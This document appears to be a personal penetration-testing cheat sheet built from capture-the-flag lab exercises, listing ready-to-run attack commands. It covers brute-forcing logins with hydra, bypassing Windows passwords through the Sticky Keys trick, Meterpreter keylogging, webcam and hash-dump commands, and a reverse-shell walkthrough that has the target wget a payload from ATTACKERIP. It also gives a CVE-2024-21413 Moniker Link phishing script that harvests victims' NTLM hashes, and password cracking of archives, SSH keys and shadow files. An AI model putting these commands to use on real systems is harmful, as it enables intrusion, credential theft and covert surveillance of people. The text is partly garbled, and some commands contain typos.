RED BOOK

Short examples for pentesting/hacking

NMAP

Scan live IPs, ports, services, versions, OS, banners.

nmap IP -scan top 1000 ports

nmap -p- IP -scan all ports

nmap -p 21,22 IP -scan chosen ports

nmap -sS IP -SYN scan, fast, stealthy

nmap -sV IP -service version detect

nmap -O IP -scan OS

nmap -sC IP -banner grab

nmap x.x.x1-50 -scan IP range

nmap -sn x.x.x.0/24 -ping scan, check if host is alive

nmap -Pn IP -if ICMP is disabled

nmap -sV --script safe IP -safe, silent, banner grab, whois, snmp, dns, OS detect

nmap -p 80 --script http-headers --script-args

http.useragent="CUSTOM_NAME_AGENT" IP -set custom agent, visible in Wireshark and packets (default is Nmap Scripting Engine)

nmap -sS -sV -O -T4 -p- IP -oN savefile.txt -fast, stealth, OS, save results

HYDRA - NETWORK LOGON CRACKER

hydra -I USERNAME -P passlist.txt ftp://MACHINE_IP

hydra -I USERNAME -P passlist.txt MACHINE IP -t 4 ssh

(-t threads to spawn)

Crack log in form:

sudo hydra USERNAME passlist.txt MACHINE IP http-post-form

"<path>:<login credentials>:<invalid response>"

If there is invalid response in response, then that are not correct credentials. Example:

Example crack on log in form (post):

hydra -I molly -P /usr/share/wordlists/rockyou.txt TARGETIP http-post-form

"/login:username=^USER^&password=^PASS^:Your username or password is incorrect."

WINDOWS ACCOUNT LOGIN ACCESS

If we have physical access to target PC with Windows system, we can change any user password and log in as that user by exploiting Sticky Keys feature.

- 1. Start PC with Win bootable USB.
- 2. On first installation screen press shift+F10 for command prompt to appear.
- 3. In cmd type notepad.
- 4. Go to Save file as to get File Explorer.
- 5. In File Explorer navigate to C:\Windows\System32, find file **sethc** (Sticky Keys) and rename it to sethc1.
- 6. In same directory find file **cmd** and rename it to sethc.

- 7. In cmd restart machine by typing: wpeutil reboot
- 8. Remove USB and go to login screen as usual.
- 9. Press shift fast 5+ times until Sticky Keys now cmd/command prompt opens.
- 10. Now we have full system privileges and we can change user password.
- 11. To check usernames of all users type: net user
- 12. To change user password type: **net user "USERNAME" 1234**

So now password for user is 1234, and we can log in as user.

GOBUSTER CRAWLER BRUTE FORCE WEBSITE PAGES

Using wordlist, search for directories, subdomains, pages on webserver.

gobuster dir -u http://WEBPAGE -w WORDLIST.txt

- -u is used to state the website we're scanning,
- -w takes a list of words to iterate through to find hidden pages
- -dir search for directories

gobuster --help

gobuster COMMAND --help

Search through directories:

gobuster dir -u "http://www.example.thm/" -w /usr/share/wordlists/dirb/small.txt -t 64

Lists directories and inside files .php and .js

gobuster dir -u "http://www.example.thm" -w WORDLIST -x .php,.js

Search through subdomains:

gobuster dns -d example.thm -w WORDLIST

Search through vhosts (different websites on same ip):

gobuster vhost -u "http://example.thm" -w WORDLIST gobuster vhost -u "http://IP" --domain example.thm -w WORDLIST --append-domain --exclude-length 250-320

METASPLOIT COMMANDS

Msfconsole

Ls

Ping 8.8.8.8 -c1 (counter 1)

Help set

History

use MODULENAME

Show options

Show payloads

Info MODULENAME

Back

Search SOMETHING

Search type:auxiliary telnet

Set **RPORT**: "Remote port", target port on the vulnerable system.

Set **PAYLOAD**: The payload you will use with the exploit.

Set **LHOST**: "Localhost", the attacking machine (your AttackBox or Kali Linux) IP address.

Set **LPORT**: "Local port", the port on attacker you will use for the reverse shell to connect back to.

Set **SESSION**: Each connection established to the target system using Metasploit have a session ID. You will use this with post-exploitation modules that will connect to the target system using an existing connection.

Setg -set values globally

Unset unset all -clear all parameters

Run - run configured exploit

Exploit -z -run process in background

background -check session name of running process

Sessions -check sessions info

Session -i SESSIONNUMBER -switch to session number

Examples

use exploit/windows/smb/ms17 010 eternalblue

Show options

set rhosts 10.10.165.3

Set rhosts FILEWITHTARGETIPS.txt

METERPRETER COMMANDS

Core commands

background: Backgrounds the current session

exit: Terminate the Meterpreter session

guid: Get the session GUID (Globally Unique Identifier)

help: Displays the help menu

info: Displays information about a Post module

irb: Opens an interactive Ruby shell on the current session

load: Loads one or more Meterpreter extensions

migrate: Allows you to migrate Meterpreter to another process

run: Executes a Meterpreter script or Post module

sessions: Quickly switch to another session

File system commands

edit: will allow you to edit a file
search: Will search for files

upload: Will upload a file or directory

download: Will download a file or directory

Networking commands

arp: Displays the host ARP (Address Resolution Protocol) cache ifconfig: Displays network interfaces available on the target system

netstat: Displays the network connections

portfwd: Forwards a local port to a remote service route: Allows you to view and modify the routing table

System commands

clearev: Clears the event logs execute: Executes a command

getpid: Shows the current process identifier

getuid: Shows the user that Meterpreter is running as

kill: Terminates a process

pkill: Terminates processes by name

ps: Lists running processes

reboot: Reboots the remote computer

shell: Drops into a system command shell like CMD/Powershell

shutdown: Shuts down the remote computer

sysinfo: Gets information about the remote system, such as OS

Others Commands (these will be listed under different menu categories in the help menu)

idletime: Returns the number of seconds the remote user has been idle

keyscan_dump: Dumps the keystroke buffer keyscan_start: Starts capturing keystrokes keyscan_stop: Stops capturing keystrokes

screenshare: Allows you to watch the remote user's desktop in real time

screenshot: Grabs a screenshot of the interactive desktop

record mic: Records audio from the default microphone for X seconds

webcam_chat: Starts a video chat

webcam_list: Lists webcams

webcam_snap: Takes a snapshot from the specified webcam webcam_stream: Plays a video stream from the specified webcam getsystem: Attempts to elevate your privilege to that of local system

hashdump: Dumps the contents of the SAM database

METERPRETER REVERSE SHELL EXAMPLE

On attacker:

msfvenom -p php/reverse_php LHOST=ATTACKERIP LPORT=8888 -f raw > reverse_shell.php

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse tcp

set Ihost ATTACKERIP

set Iport 9000

run

Transfer file to target device, on attacker device run HTTP server:

python3 -m http.server 9000 (open http on port 9000)

On target device:

wget http://ATTACKERIP:9000/reverse_shell.php

chmod 777 reverse shell.php

./reverse shell.php

Now reverse shell on meterpreter is opened.

MONKIER LINK (CVE-2024-21413)

Send Moniker Link to a victim, resulting in Outlook sending the user's NTLM credentials to the attacker once the hyperlink is clicked. The vulnerability here exists by modifying our hyperlink to include the ! special character and some text in our Moniker Link which results in bypassing Outlook's Protected View.

Example Monkier link in HTML code to send on target to click:

Click me.

Moniker link script for remote code execution, save as example.py

,,,

Author: CMNatic | https://github.com/cmnatic

Version: 1.0 | 19/02/2024

,,,

import smtplib

from email.mime.text import MIMEText

from email.mime.multipart import MIMEMultipart

from email.utils import formataddr

sender_email = 'attacker@monikerlink.thm' # Replace with your sender email address receiver_email = 'victim@monikerlink.thm' # Replace with the recipient email address password = input("Enter your attacker email password: ")

html_content = """\

<!DOCTYPE html>

<html lang="en">

Click me

```
</body>
</html>"""
message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender email))
message["To"] = receiver email
# Convert the HTML string into bytes and attach it to the message object
msgHtml = MIMEText(html content,'html')
message.attach(msgHtml)
server = smtplib.SMTP('MAILSERVER', 25)
server.ehlo()
try:
  server.login(sender_email, password)
except Exception as err:
  print(err)
  exit(-1)
try:
  server.sendmail(sender email, [receiver email], message.as string())
  print("\n Email delivered")
except Exception as error:
  print(error)
finally:
  server.quit()
With responder tool listen on ens5 network interface:
responder -I ens5
Run python exploit.py
When target clicks link we will get info, NTLMv2 hash from responder window.
JOHN THE RIPPER
```

RAR2JOHN

Brute force RAR password protected file.

rar2john [rar file] > [output file]

First, extract the hash (password hash) from a RAR file:

/opt/john/rar2john rarfile.rar > rar hash.txt

Brute force file with rar hash:

john --wordlist=/usr/share/wordlists/rockyou.txt rar hash.txt

Unpack password protected rar file and enter password found.

unrar rarfile.rar

SSH2john

Crack the SSH private key from id_rsa and brute force hash to get password. ssh2john

converts the id_rsa private key, which is used to log in to the SSH session, into a hash format that John can work with.

python3 /opt/john/ssh2john.py

ssh2john [id_rsa private key file] > [output file]

/opt/john/ssh2john.py FILE.id_rsa > ssh_hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash.txt

Zip2john

Brute force ZIP password protected file. First create hash from zip file.

zip2john SOMEZIP.zip > ziphash.txt

Brute force hash zip file for password.

john --wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt

john --show ziphash.txt

Custom rules John

Custom passwords generator.

In file: /opt/john/john.conf or /etc/john/john.conf create:

[List.Rules:THMRules] is used to define the name of your rule

Az: Takes the word and appends it with the characters you define

A0: Takes the word and prepends it with the characters you define

c: Capitalises the character positionally

[0-9]: Will include numbers 0-9

[0]: Will include only the number 0

[A-z]: Will include both upper and lowercase

[A-Z]: Will include only uppercase letters

[a-z]: Will include only lowercase letters

Example: [List.Rules:PoloPassword]

cAz"[0-9] [!£\$%@]"

Utilises the following: c: Capitalises the first letter, Az: Appends to the end of the word, [0-9]:

A number in the range 0-9

[!£\$%@]: The password is followed by one of these symbols.

We cand then call this custom rule with argument using the --rule=PoloPassword flag.

john --wordlist=[path to wordlist] --rule=PoloPassword [path to hashfile]

UNHASH ROOT USER SHADOW FILE WITH JOHN

Unshadow /etc/passwd /etc/shadow > passfile.txt john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt passfile.txt John --show passfile.txt

JOHN THE RIPPER - CRACK HASH

john --wordlist=[path to wordlist] --format=[format] [path to hashfile]

Use hash identifier to check for hash format:

https://hashes.com/en/tools/hash_identifier

Python hash identifier:

https://gitlab.com/kalilinux/packages/hash-identifier/-/tree/kali/master

Launch hash identifier: python3 hash-id.py

Search for John formats - check hash formats for md5:

john --list=formats | grep -iF "md5"

Example full command:

john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt hash3.txt

Check cracked hash:

Cat /home/user/src/john/run/john.pot

GOBUSTER CRAWLER BRUTE FORCE SEARCH WEBPAGES

Using wordlist, search for directories on webserver to detect what pages webserver have.

gobuster -u http://WEBPAGE -w WORDLIST.txt dir

- -u is used to state the website we're scanning
- -w takes a list of words to iterate through to find hidden pages
- -dir search for directories

TRANSFER FILES USING HTTP

Start http server with Python (Win) and download files on target with wget request. On attacker (win):

python3 -m http.server 1234 c:/testdir

-1234 is port where http server will listen, and in last part is directory for http server (not required). For Linux, you could use **python -m SimpleHTTPServer PORT** On target in CMD (win/linux/any):

wget http://ATTACKERIP:1234/SOMEFILEINROOTDIR